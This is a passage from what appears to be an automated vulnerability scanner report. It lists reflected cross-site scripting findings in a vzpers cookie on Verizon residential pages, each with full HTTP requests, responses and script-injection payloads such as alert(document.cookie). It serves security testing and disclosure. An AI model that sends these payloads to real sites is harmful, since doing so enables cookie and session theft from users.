Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX19DA6<SCRIPT>ALERT(1)</SCRIPT>AB7F85E6843 </DIV>
...[SNIP]...

1.118. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f50d'><script>alert(1)</script>e0d60ac13cb was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6f50d'><script>alert(1)</script>e0d60ac13cb; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73675
Expires: Mon, 13 Dec 2010 00:48:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:48:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:48:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6F50D'><SCRIPT>ALERT(1)</SCRIPT>E0D60AC13CB ' />
...[SNIP]...

1.119. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 19604<script>alert(1)</script>52fdc71012b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX19604<script>alert(1)</script>52fdc71012b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73671
Expires: Mon, 13 Dec 2010 00:48:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:48:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:48:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX19604<SCRIPT>ALERT(1)</SCRIPT>52FDC71012B </DIV>
...[SNIP]...

1.120. http://www22.verizon.com/Residential/aboutfios/Reviews.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/Reviews.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload d2997<script>alert(1)</script>029027b9f5d was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/Reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXd2997<script>alert(1)</script>029027b9f5d; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73806
Expires: Mon, 13 Dec 2010 00:50:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:50:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:50:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:34 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:34 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD2997<SCRIPT>ALERT(1)</SCRIPT>029027B9F5D </DIV>
...[SNIP]...

1.121. http://www22.verizon.com/Residential/aboutfios/Reviews.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/Reviews.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35cba'><script>alert(1)</script>cd8e351936c was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/Reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX35cba'><script>alert(1)</script>cd8e351936c; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72268
Expires: Mon, 13 Dec 2010 00:50:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:50:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:50:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX35CBA'><SCRIPT>ALERT(1)</SCRIPT>CD8E351936C ' />
...[SNIP]...

1.122. http://www22.verizon.com/Residential/aboutfios/labs.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/labs.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c96e5'><script>alert(1)</script>0e2533a5727 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXc96e5'><script>alert(1)</script>0e2533a5727; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78190
Expires: Mon, 13 Dec 2010 00:50:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:50:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:50:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC96E5'><SCRIPT>ALERT(1)</SCRIPT>0E2533A5727 ' />
...[SNIP]...

1.123. http://www22.verizon.com/Residential/aboutfios/labs.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/labs.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload fc373<script>alert(1)</script>6d73c0796ef was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXfc373<script>alert(1)</script>6d73c0796ef; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78186
Expires: Mon, 13 Dec 2010 00:50:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:50:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:50:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:50:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFC373<SCRIPT>ALERT(1)</SCRIPT>6D73C0796EF </DIV>
...[SNIP]...

1.124. http://www22.verizon.com/Residential/aboutfios/widgets.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/widgets.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 16312<script>alert(1)</script>8f07045cb3c was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX16312<script>alert(1)</script>8f07045cb3c; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73651
Expires: Mon, 13 Dec 2010 00:49:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:49:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:49:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX16312<SCRIPT>ALERT(1)</SCRIPT>8F07045CB3C </DIV>
...[SNIP]...

1.125. http://www22.verizon.com/Residential/aboutfios/widgets.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutfios/widgets.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6a84f'><script>alert(1)</script>56609e02d0a was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutfios/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6a84f'><script>alert(1)</script>56609e02d0a; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73655
Expires: Mon, 13 Dec 2010 00:49:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:49:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:49:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:11 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6A84F'><SCRIPT>ALERT(1)</SCRIPT>56609E02D0A ' />
...[SNIP]...

1.126. http://www22.verizon.com/Residential/wifi [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/wifi

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 675fb'><script>alert(1)</script>2a4fd6f7fb1 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/wifi HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX675fb'><script>alert(1)</script>2a4fd6f7fb1; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72106
Expires: Mon, 13 Dec 2010 00:55:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX675FB'><SCRIPT>ALERT(1)</SCRIPT>2A4FD6F7FB1 ' />
...[SNIP]...

1.127. http://www22.verizon.com/Residential/wifi [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/wifi

Issue detail

